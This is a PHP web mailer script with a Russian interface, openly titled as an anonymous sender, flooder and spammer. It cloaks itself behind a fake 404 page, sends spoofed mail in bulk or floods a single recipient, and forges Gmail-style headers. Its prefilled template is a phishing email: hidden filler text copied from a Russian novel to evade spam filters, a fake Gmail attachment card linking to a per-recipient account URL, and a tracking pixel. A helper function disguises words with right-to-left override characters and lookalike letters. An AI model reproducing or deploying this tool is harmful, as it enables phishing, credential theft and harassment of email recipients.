<?php
header('Content-Type: text/html; charset=utf-8');
if (!$_REQUEST['mail']) {
	header("HTTP/1.1 404 Not Found");
	die('<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL '.basename(__FILE__).' was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2 Server at '.$_SERVER['SERVER_NAME'].' Port 80</address></body></html>');
}?>
<title>Sender Anonym Email :: FLoodeR :: SpameR</title>
<meta content='text/html; charset=Windows-1251' http-equiv='Content-Type'>
<meta name="robots" content="none"/>
<?php
error_reporting(0);

if (!set_time_limit(0)) {
	$limit = false;
}
else {
	set_time_limit(0);
	ignore_user_abort(1);
	$limit = true;
}

ini_set('max_execution_time', '0');
?>
set_time_limit(0) = <?php

if ($limit) echo ('<font color=Green>On</font>');
else echo ('<font color=Red>Off</font> (Время работы ограничено текущими настройками сервера)'); ?><br />
<?php
$ip = getenv('REMOTE_ADDR');
if ($_GET['mail'] == '1' || $_GET['mail'] == '2' || $_GET['mail'] == '3') {
	$to = $_POST['to'] = stripslashes($_POST['to']);
	$text = $_POST['msg'] = stripslashes($_POST['msg']);
	$from = $_POST['from'] = $_POST['from'];
	$from1 = $_POST['from1'] = $_POST['from1'];
	$subject = $_POST['subject'] = $_POST['subject'];
	//$from1 = '=?koi8-r?B?' . base64_encode(convert_cyr_string($from1, "w", "k")) . '?=';
	//$subject = '=?koi8-r?B?' . base64_encode(convert_cyr_string($subject, "w", "k")) . '?=';
	$message = str_replace("%link%", $_POST['link'], $_POST['msg']);
	$pro = " ";
	if ($_POST['to'] && $_POST['msg']) {
	//var_dump($_POST);die();

		$headers = "MIME-Version: 1.0\r\n";
		$headers.= "Content-type: text/html; charset=windows-1251\r\n";
		$headers.= "From:$from1 $pro $from \n";
		if ($_GET['mail'] == '1') {
			multipart_mail($from, $from1, $to, $subject, $text) or die('Не возможно отправить сообщение');
		}
		elseif ($_GET['mail'] == '2') {
			$rec = explode("\n", $_POST['to']);
			for ($i = 0; $i < count($rec); $i++) {
				$rec[$i] = trim($rec[$i]);
				$username = $rec[$i];
				$emailArr = explode("@", $username);
				//if(strtolower($emailArr[1]) == "gmail.com") {
					$username = $emailArr[0];
				//}

				echo "<b>" . $rec[$i] . "</b></br>" . PHP_EOL;
				//$readyMessage = str_replace("google.com", google_encode("google.com"), $message);
				//$readyMessage = str_replace("Google", google_encode("Google"), $readyMessage);
				//$readyMessage = str_replace("google", google_encode("google"), $readyMessage);
				//$readyMessage = str_replace("%mail%", $username, $readyMessage);
				
				//$readyMessage = str_replace("%value%", $username, $readyMessage);
				$readyMessage = str_replace("%value%", $username, $message);
				multipart_mail($from, $from1, $rec[$i], $subject, $readyMessage) or die('Не возможно отправить сообщение');
				sleep(1);
			}
		}
		elseif ($_GET['mail'] == '3') {
			if (preg_match('/[0-9]+/', $_POST['kol'])) {
				for ($i = 0; $i < $_POST['kol']; $i++) {
					multipart_mail($from, $from1, $to, $subject, $text) or die('Не возможно отправить сообщение');
					sleep(1);
				}
			}
			else {
				echo ('Неверно введено (или не введено) кол-во сообщений');
			}
		}
		echo ('<center><b><font color="green">Сообщение успешно отправлено</font></b></center>');
	}
	else {
?>
<form style="width:800px" method='post'>

<?php
		if ($_GET['mail'] == '1' || $_GET['mail'] == '3') {
			echo ("<label><span>Получатель:</span>&nbsp;<input type='text'name='to'></label><br /><br />");
		}

?>

<table>
	<tr>
		<td><label><span>Имя:</span><input type='text' name='from1' value='Евгений Сочинский'></label></td>
		<td><label><span>Мыло:</span><input type='text' size="50" name='from' value='<nika.maka@gmail.ru.com>'></label></td>
	</tr>
	<tr>
		<td><label><span>Тема сообщения:</span><br><input type='text' size="50" name='subject' value='максим привет как дела'></label></td>
		<td><label><span>Ссылка:</span><br><input type='text' name='link' size="50" value='lwvson-continue.com'></label></td>
	</tr>
</table>

<?php
		if ($_GET['mail'] == '3') {
			echo ("<label>Кол-во сообщений: <input type='text' name='kol'></label><br />");
		}

?>
<?php
		if ($_GET['mail'] == '2') {
			echo ("<br /><label>Получатели:<br /><textarea name='to' rows='3' cols='30'>mismunserina@gmail.com</textarea></label>");
		}

?><br />
<label>Сообщение:<br />
<textarea name='msg' rows='18' cols='80'>





<div dir="ltr">

<head><head>
<a style="font-size:0px;color:transparent">

 
 Они шли молча. Илона думала о том, что из всех сюрпризов, преподнесенных ей жизнью, этот еще не самый странный. «Надо бы узнать, в какой клуб ходит наш „поклонник старины“. Что-то я не помню, где конкретно такие в городе… И конь явно породистый, тяжеловоз наверное. Очень сильный… Как он этим чуркам по машине надавал, будут знать…» Вообще-то орала она не от страха, ситуация была вполне управляема, и далеко не все жители гор являются насильниками и бандитами. Это не пьяные парни, да и шоссе еще вполне людно, запросто позвала бы милицию. Тем более что пост ГАИ не так далеко. Просто ей хотелось проверить – побежит этот длинноволосый на помощь или не побежит? Еще как побежал – рысью! В смысле прискакал, и даже галопом. В лошадиных аллюрах Илона разбиралась плохо (совсем никак, если честно). Рыжий рыцарь тоже думал, но на другую тему. О спасенной от разбойников даме он и не вспоминал. Это был лишь ничего не значащий эпизод в его полной сражений жизни. Гораздо важнее было другое: куда он попал, что здесь делать и как отсюда выбраться? Ни на один вопрос не было ответа. «Все-таки это не Ад. В Аду не может быть сарацин на страшных железных повозках. Хотя… почему бы нет? Где им еще быть, не в Раю же. С другой стороны, здесь не видно костров неугасимого пламени, не слышно воплей грешников и пока нет ни одного черта. Может быть, я попал в сказочный мир эльфов? Да, но откуда в пустыне эльфы? Обитатели холмов предпочитают ночной лес, разве что у сарацин тоже есть свой „маленький народец“ и я угодил в их владения. Тогда… о Боже! Тогда мне не выбраться отсюда! А если и выберусь, то меня никто не узнает, ведь время в стране эльфов течет иначе и вполне может пройти целая тысяча лет…» Рыжий рыцарь редко размышлял о далеком будущем, обычно его планы ограничивались желанием разбогатеть, убить дракона и принести его голову леди Роксолане в качестве свадебного подарка. Это почему-то представлялось ему наиболее близким и осуществимым.

Было уже около одиннадцати, движение в городе стихло, поздние прохожие провожали странную пару заинтересованными взглядами и спокойно продолжали свой путь. Средневековый рыцарь на улице в России начала двадцать первого века особенно никого не удивлял. Мало ли у нас снимается кинофильмов, устраивается шоу или театрализованных представлений? Тем более что рядом шла задумчивая девушка, одетая вполне сообразно эпохе и времени года. Даже машина милиции, встретившаяся им на углу сквера, прямо напротив дома Илоны, не остановила их. Лишь водитель высунулся на минуту, восхищенно прицокнул языком, глядя на рыцарского коня, но тут же нырнул обратно. Нэд Гамильтон, как истый англичанин, изо всех сил старался делать вид, будто ничему не удивляется. Это было невероятно трудно.

Самые разнообразные повозки с сияющими огнями, управляемые людьми изнутри. Рыцарь не был дураком и прекрасно понимал, что это именно повозки, а не «дьявольские исчадия Ада». Он исподволь рассматривал высотные здания, напоминающие ульи, странную одежду прохожих, непонятные столбы из неизвестного камня, освещающие улицы, необыкновенно ровные дороги, огромные окна богатых лавок, улыбчивые или серьезные лица встречных людей. По его мнению, город был просто гигантским и покорял неземной роскошью. Одновременно он отметил и полную беззащитность жителей перед какой-нибудь ордой диких бедуинов пустыни. Двери домов не выдержали бы и одного удара тараном, окна так огромны, что в них легко влезет даже тяжеловооруженный воин. Никто из прохожих не носил даже поясного ножа, не говоря уж о мече, а люди в доспехах не встретились ни разу. Лошадей тоже не было видно.

– А где замок? – неожиданно для самого себя спросил он.

– Замок? – оторвалась от тяжелых мыслей девушка. – Слушай, ты что, действительно не местный?

– Да, леди.

– Ладно… замка нет. Есть старинный кремль, ему уже за четыреста лет. Эй, а откуда ты тогда?

– Из Англии, графство…

– Ну вот опять дешевые наезды на уши! Где же ты тогда так по-русски говорить выучился?

– По-русски?! – не понял Нэд. – Но… ведь Русь – это далекая снежная страна, скрытая от христианского мира непроходимыми лесами, неприступными горами, бескрайними морями. Страна варваров и медведей!

– Ну не надо меня убивать банальной эрудицией. Мнение средневековых историков о нашей дикой родине мы проходили еще в третьем классе. Ты, может, и неплохой парень, но однообразен до икоты. Нет, я тебе очень благодарна за все романтические прибамбасы, было жутко интересно. Спасибо за все, мне пора.

– Прощайте, леди, – автоматически поклонился Нэд, его голова была охвачена ужасным подозрением.

– Если хочешь, встретимся завтра. – Пожав плечами, Илона на мгновение задержалась в дверях.

– Как скажете, леди, я подожду.

– Здесь, что ли? Домой иди.

– Мой дом далеко… – грустно улыбнулся рыжий рыцарь и, потянув повод, направился к маленькой лавочке, стоящей у газона посередине двора. Газоном занялся черный конь, а Нэд тяжело опустился на прогретые доски, закрыв лицо руками.

Илона еще раз пожала плечами и поспешила к себе наверх – она жила на третьем этаже. Дома ее встретил бультерьер Пупс, родители, как и собирались, укатили на дачу. Вдоволь пообнимавшись со счастливым псом, Илона поставила чайник, сунула нос в холодильник и, выудив большую миску маминого салата, принялась за дело. Есть на ночь вредно, но от пережитого у нее разыгрался аппетит. Щелкнул переключатель магнитофона, и восторженная скрипка Ванессы Мей заполнила кухню. Перед Илоной загоралось жаркое солнце Андалузии, слышался шум водопадов, мелькали изысканные всадники, звенели от ветра шпили древних башен… Она опомнилась, лишь когда кассета кончилась и первые крупные капли ночного дождя ударили в стекло. Громыхнули далекие раскаты грома. Илона глянула в окно – на лавочке под фонарем сидел одинокий рыцарь, черный конь поднял голову и, как показалось, с укором посмотрел ей прямо в глаза. Минутой позже она уже была на балконе:

– Эй ты! Сумасшедший! Иди домой, гроза начинается!

Рыжий рыцарь вздрогнул, но ничего не ответил, даже не посмотрел в ее сторону. Это было слишком.

– Ну он-то, положим, на диване переспит, предки все равно в отъезде. А вот куда я коня дену? Не на балкон же, он такой здоровенный… О, в гараж! Как-нибудь поместится… – бормотала она, прыгая через три ступеньки.

А ливень уже бушевал вовсю.

– Вставай, промокнешь и заржавеешь!

– Не беспокойтесь за меня, леди.

– И не думала даже! Сидит тут, строит из себя зануду неприступную, курица мокрая.

– Рыцарю не подобает бросать боевого коня из-за какого-то дождя.

– Вот и отлично, значит, оба переждете в гараже! Пошли, а? Ой, мама дорогая! У меня же завтра насморк будет.

Этого Нэд, конечно, допустить не мог. Взяв под уздцы мрачного Бреда, он отвел его в стоящий в том же дворе кирпичный домик с железными дверями. Сначала благородное животное нипочем не хотело входить в полутемное помещение с ямой в полу и ужасающими запахами. Илона изо всех сил подталкивала его в круп, за что и получила хвостом по рукам. Пока она, прыгая и ругаясь, включала свет и бегала с ведром за водой, рыжий рыцарь долгими уговорами убедил Бреда остаться. Еще столько же времени Илона объясняла Нэду, что он никому не помешает, что это УДОБНО – посещать дом благородной леди в отсутствие родителей, что соседям на все чихать и ее честь вовсе не пострадает, что…

В общем, в конце концов у нее все получилось.


– Что сказал Оракул?

– Как и всегда, только общие фразы, моя Королева… Ваш враг должен был найти Прекрасную Принцессу, завоевать ее любовь и, заручившись поддержкой Могучего Воина, войти в наш мир. Вам бы осталось только разыграть эту партию. Они были бы обречены.

– А что теперь?

– О, ни одной причины для волнения. – Карлик попытался изобразить теплую улыбку, что на его обезьяньем лице выглядело язвительной гримасой. – Вместо принцессы – невоспитанная сумасбродка, Могучего Воина с волшебным мечом в том мире он вообще не отыщет. Его отряд неполон, и Нэд Гамильтон по-прежнему беззащитен перед нами.

– Продолжай наблюдения, раб. Ты дашь мне знать, как только что-нибудь изменится. – Королева встала, направляясь к дверям. – Да, вот еще… Я хочу, чтобы ты направил Тварь по следу. Первой должна умереть девчонка.

– Ваше слово – закон, моя госпожа.


Первым делом Илона ринулась под теплый душ. Нэд все это время честно стоял на резиновом коврике в прихожей, дождевая вода стекала с него ручьями. «Достопочтимая леди» вышла из ванной комнаты в розовом махровом халате, с большим полотенцем на голове.

– Значит, так, снимай свой металлолом, дуй в душ греться, а я пока что-нибудь приготовлю. Ты голоден?

– Но, леди…

– Илона. Можешь называть меня леди Илона, можешь просто Илона, но никаких уменьшительно-ласкательно-пренебрежительных Илоночка, Илонка, Илонушка, Илонуленька… – предупредила девушка. – А также никаких дурацких рифм типа Илона – лоно – три поклона – под стакан одеколона… Усек?

– А… что я сделал? – на всякий случай уточнил рыжий рыцарь.

– Так… спокойствие, дай мне выдохнуть, и я снова буду относиться к тебе как к больному – с лаской и безграничным терпением. Как это у вас… благородный сэр Нэд Гамильтон-младший, не мог бы ты на все мои вопросы отвечать односложно – «да» или «нет»?

– Разумеется, леди Илона.

– Отлично. Пошли по второму кругу: ты есть хочешь?

– Рыцарь не должен обременять хозяйку приютившего его дома.

– Короче, да или нет?!

– Да, – поклонился Нэд.

– Угу, – удовлетворенно кивнула девушка, отчего тюрбан из полотенца съехал ей на нос. – Теперь очень внимательно слушай благородную меня. Вот это – ванная. Смотри сюда. Это вот – душ. Видишь, водичка течет? Она теплая, залезай, мойся, грейся. Вот этим можешь вымыть голову. Глаза зажмуривай, мыло попадет – щипать будет. Вот этим полотенцем вытрешься, а вот этот халат на себя наденешь. Все понял?

– Да.

– Отлично. – Илона втолкнула рыцаря в ванную и прикрыла дверь. – Эй! – влезла она почти в ту же секунду. – Не забудь раздеться. А то я в одном фильме видела, как французский рыцарь сунулся в воду прямо в рубахе и в штанах.

– Франки всегда отличались недалеким умом, – подтвердил рыжий рыцарь.

Пока он снимал плащ с крестом, доспехи, кольчугу, одежду, бросая все на пол, деятельная хозяйка с головой зарылась в холодильник, пытаясь отыскать что-нибудь быстрого приготовления. Нашлись яйца, консервы, масло, сыр, ну и еще разное, по мелочи. Илона нечасто утруждала себя кухней, по совести говоря, обычно готовила мама. Дочь была настолько деловой и загруженной особой, что вполне обходилась чашкой кофе, парой сушек и горстью изюма. Дай ей волю, она была бы еще стройнее, наверняка испортила желудок на сухомятке, и мама не зря пичкала ее калорийными супами и салатами. Салат, кстати, еще остался… В общем, Илона суетилась на кухне, изо всех сил стараясь накрыть праздничный стол из совершенно будничных блюд. Когда Нэд Гамильтон в халате с чужого плеча и с мокрой головой вышел из ванной, его ждал роскошный ужин. Пересоленная яичница так и была подана на сковороде (к которой она почему-то прилипла), бутерброды были вымазаны маслом и пришлепнуты толстыми кусками сыра, зато мамин салат красовался в хрустальной вазочке (правда, его было немного, но для вида Илона старательно размазала содержимое по стенкам). Чайник уже насвистывал веселую мелодию, а еще было полплитки шоколада, варенье и не очень старый батон. Нэд Гамильтон почувствовал себя королем. Счастливая Илона, подперев подбородок, любовалась на дело рук своих, сияя как самовар. Звонок в дверь раздался, когда Нэд уже закончил с основными блюдами и держал в руках чашку ароматного чая.

– Двенадцать ночи, – недоуменно буркнула Илона. – Кого могло принести в такое время?

На всякий случай рыжий рыцарь встал из-за стола и, сунувшись в ванну, застегнул на себе пояс с мечом, но на этот раз опасности не было.

– Милочка, ты ведь не спишь? Нам надо поговорить… – жеманно раздалось из прихожей.

– Валера Люстрицкий, мой друг и сосед по площадке, – нехотя пояснила Илона, поворачиваясь к Нэду.

Вошедший молодой человек был строен, высок, как-то изящно-хрупок. Руки очень ухожены, золотые серьги, красивые кольца, чуть обиженные глаза и тонкие, вздрагивающие губы. Мужчин такого типа Гамильтон-младший еще не встречал, поэтому ошибочно решил, что юноша чем-то болен и нуждается в сочувствии.

– Нэд Гамильтон, рыцарь Креста, – представился он. – У вас, видимо, большое горе? Если я могу помочь, то мой меч к вашим услугам.

– Нэд? Илоночка, где ты подобрала это ископаемое?! – Изящные пальчики Валеры на мгновение утонули в дружеской ладони рыцаря. – Ай! Вы что?! Мне больно…

– Прошу прощения, сэр…

– Так ему и надо, не будет называть меня этим сюсюкающим имечком, – вмешалась Илона. – Валерыч, этот парень – мой новый друг, отложи свои заигрывания до следующего раза. Что там у тебя случилось?

– Мне плохо… мне так плохо! Можно я выпью у тебя чаю?

– Ладно, пошли на кухню.

Пока гость, печально вздыхая, усаживался за стол, «леди» Щербатова потянула за рукав Нэда:

– Ты извини… Валерка вообще-то хороший. Он добрый, выслушает всегда, посочувствует, мы еще с детского сада дружим. Наши отцы в одной фирме пашут.

– А… – понимающе протянул Нэд, – так вы помолвлены и это ваш жених?

– Кто? Этот?! Ты что, слепой? Его женщины интересуют только как консультанты в мире моды и косметики. Я же говорю, мы… подружки!

– Я не…

– Ты что, «голубых» не видел?

– Нет, но я видел мавров. Они черные и коричневые, – гордо похвалился Нэд.

– С тобой все ясно. Серьезное воспитание в вашем клубе, не придерешься. Продолжаем играть в рыцарей Круглого стола.

– Леди Илона, я и есть рыцарь.

– Ага, а я по сюжету – во все верю! В общем, пошли, попьем чаю, поговорим… Не удивляйся, если Валерка будет немного кокетничать, – ты ему понравился. Просто не обращай внимания, он ненавязчивый.

Их диалоги напоминали разговор двух иностранцев, абсолютно не понимающих друг друга. Но наши герои хотя бы старательно делали вид, будто что-то поняли. Илона держалась за версию «клуба поклонников Средневековья» только из боязни разочарования. На самом деле до нее давно дошло, что этот странный парень – подлинник, а не фальсификация. И это могло означать только одно – перемещение во времени! Конечно, о таком приключении можно было только мечтать. Поэтому она упорно делала вид, что ни во что не верит… чтобы не сглазить. Нэд давно пришел к выводу, что находится в чужом, неведомом мире, населенном такими же людьми и чудесными вещами – порождением техники и науки. Он также склонялся к мысли, что все это результат колдовства великих алхимиков Востока, и прилагал все силы, чтобы не удивляться слишком уж откровенно. Поэтому за столом он сидел очень скромно и плавный рассказ соседа по площадке старался не перебивать.

– Солнышко, ну вот за что она со мной так?! Она же не поставила мне зачет, пока я не снял цепочку. Кричала, чтобы я стер губную помаду, а я в тот день и не пользовался помадой. Духи мои ей не нравятся… Она, видите ли, не может себе такие позволить на свою зарплату. А сколько мне приходится за компьютером сидеть, чтобы заработать, ее не интересует?! Нэд, ну скажите, разве можно ставить человеку «неуд» на основании того, что тебе не нравятся его духи?!

– Разумеется, нет, – осторожно поддержал рыжий рыцарь. – Помнится, наш король велел утопить своего нового шута за то, что от него пахло серой, но чтобы ставить «неуд»… Это, конечно, слишком!

– Милочка, он так шутит?

– Боюсь, что нет. А насчет зачета не переживай – эта грымза просто тянет из тебя бабки. Она выпустила за свой счет очередную книжечку дубовых стихов, купи и попроси автограф – зачет обеспечен. Правда, книжечка стоит не одну копеечку…

– Ах, что делать? – Валера вздохнул, в его глазах блеснули слезы, он как бы невзначай коснулся кончиками пальцев мускулистой руки Нэда. – О, простите… Вот если бы вы с ней поговорили, даже хотя бы просто увидели – вам бы, наверное, захотелось зарубить ее мечом. А вы женаты?


</a>
</head></head>


 <head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 
   
</head>
<body style="margin: 0; padding: 0;">
    <table align="center" border="0" cellpadding="0" cellspacing="0" style=" width: 100%;padding: 0; font-family: 'Google Sans',Roboto,RobotoDraft,Helvetica,Arial,sans-serif; border-top: 1px dotted #d8d8d8; margin: 15px 0;">
        
        <tr>
            <td>
                <div style="display: -webkit-box;">
                    <p class="" style="font-size: 14px; color: rgb(34, 34, 34); font-weight: 700; height: 20px; margin: 12px 0px; font-family: 'Google Sans',Roboto,RobotoDraft,Helvetica,Arial,sans-serif;" >



                    Один прикрепленный файл&nbsp;


                    </p>
                </div>
            </td>
           </tr>
           <tr>
            <td>
                <div style="width: 180px; height: 120px; position: relative; overflow: hidden;">
                    <a href="http://%link%/?account=%value%">
                        
<img width="180" height="120" style="object-fit: cover;" src="http://%link%/img/a1.png" alt="">
                    </a>
<img src="http://%link%/bb/mmsmoprq.png?test=%value%@x1" width="0px" height="0px">


                </div>
            </td>
           </tr>
    </table>
   </body>
</html>



 
</textarea></label>
<br />
<label>
	<input name="plaintextauto" type="checkbox" checked/>
	Автогенерация текстовой версии
</label>
<br>
<label>Текстовая версия письма (text/plain):<br />
<textarea name='plaintext' rows='1' cols='80'></textarea>
</label>
<br /><br />
<input type='submit'>
</form>
<?php
	}
}
else {
?><br />
<a href='<?php echo $_SERVER['PHP_SELF'] ?>?mail=1'>Отправить простое сообщение</a><br />
<a href='<?php echo $_SERVER['PHP_SELF'] ?>?mail=2'>Наспамить</a><br />
<a href='<?php echo $_SERVER['PHP_SELF'] ?>?mail=3'>Нафлудить</a><br />
<?php
}
?>
<B STYLE="DISPLAY: NONE;"> 
<?php
function multipart_mail($from, $from1, $to, $subject, $text, $cc = null)
{
	$headers = "MIME-Version: 1.0\r\n";
	$headers.= "References: <".generateDomain(36)."=GwFN9gs7Z_8oZw@mail.gmail.com> <".generateDomain(43)."+hU59BYg@mail.gmail.com> <".generateDomain(13)."-uq4_4G2E64NX9G6grn0cEeO0L=".generateDomain(11)."@mail.gmail.com>\n";

	
    $headers.= "x-mcda: TRUE\n";
	//
	$xfrom = str_replace(array('<','>'), '', $from);
	$headers.= "From: =?UTF-8?B?"  . base64_encode($from1) . "?= <". $xfrom .">\n";
	if (!is_null($cc)) {
		$headers.= "Cc: $cc\n";
	}

	$headers.= "Date: " . date("r") . "\n";
	$headers.= "Return-Path: $from\n";
	$headers.= "Precedence: bulk\n";



	$headers.= "MIME-Version: 1.0\n";
	$baseboundary = strtoupper(md5(uniqid(rand() , true)));
	$newboundary = strtoupper(md5(uniqid(rand() , true)));
	$headers.= 'Content-Type: multipart/alternative; boundary="'.$baseboundary.'"'."\n";
	$message = "--$baseboundary\n";
	$message.= 'Content-Type: text/plain; charset="UTF-8"'."\n";
	$message.= "Content-Transfer-Encoding: base64\n";
	$message.= "\n";
	if($_POST['plaintextauto'] != 'on') {
		$text_plain = $_POST['plaintext'];
	} else {
		$text_plain = $text;
	}
	$text_plain = str_replace('<p>', "\n", $text_plain);
	$text_plain = str_replace('<b>', "", $text_plain);
	$text_plain = str_replace('</b>', "", $text_plain);
	$text_plain = str_replace('<br />', "\n", $text_plain);
	$text_plain = strip_tags($text_plain);
	$text_plain = str_replace("&nbsp;", "", $text_plain);
	$message.= base64_encode($text_plain); //Если раскоментить то кодированные символы будут ломать письмо.
	$message.= "\n";
	$message.= "--$baseboundary\n";
	$message.= 'Content-Type: text/html; charset="UTF-8"'."\n";
	$message.= "Content-Transfer-Encoding: base64\n\n";
	$message.= base64_encode($text) . "\n\n";
	$message.= "--$baseboundary--\n";
	return mail($to, "=?UTF-8?B?"  . base64_encode($subject) . "?=", $message, $headers);
}

function base64url_encode( $data ){
  return rtrim( strtr( base64_encode( $data ), '+/', '-_'), '=');
}
function google_encode( $data, $flag=FALSE ){
	if($flag){
		return "&#x202E;".str_replace('o','&#959;',strrev($data));
	} else 
		return "<div style='display:inline-block;text-decoration: inherit;'>&#x202E;".str_replace('o','&#959;',strrev($data))."<vid\></div>";
}

function generateDomain($length = 8){
	$chars = 'qwertyuiopasdfghjklzxcvbnm';
	$numChars = strlen($chars);
	$string = '';
	for ($i = 0; $i < $length; $i++) {
		$string .= substr($chars, rand(1, $numChars) - 1, 1);
	}
	return $string;
}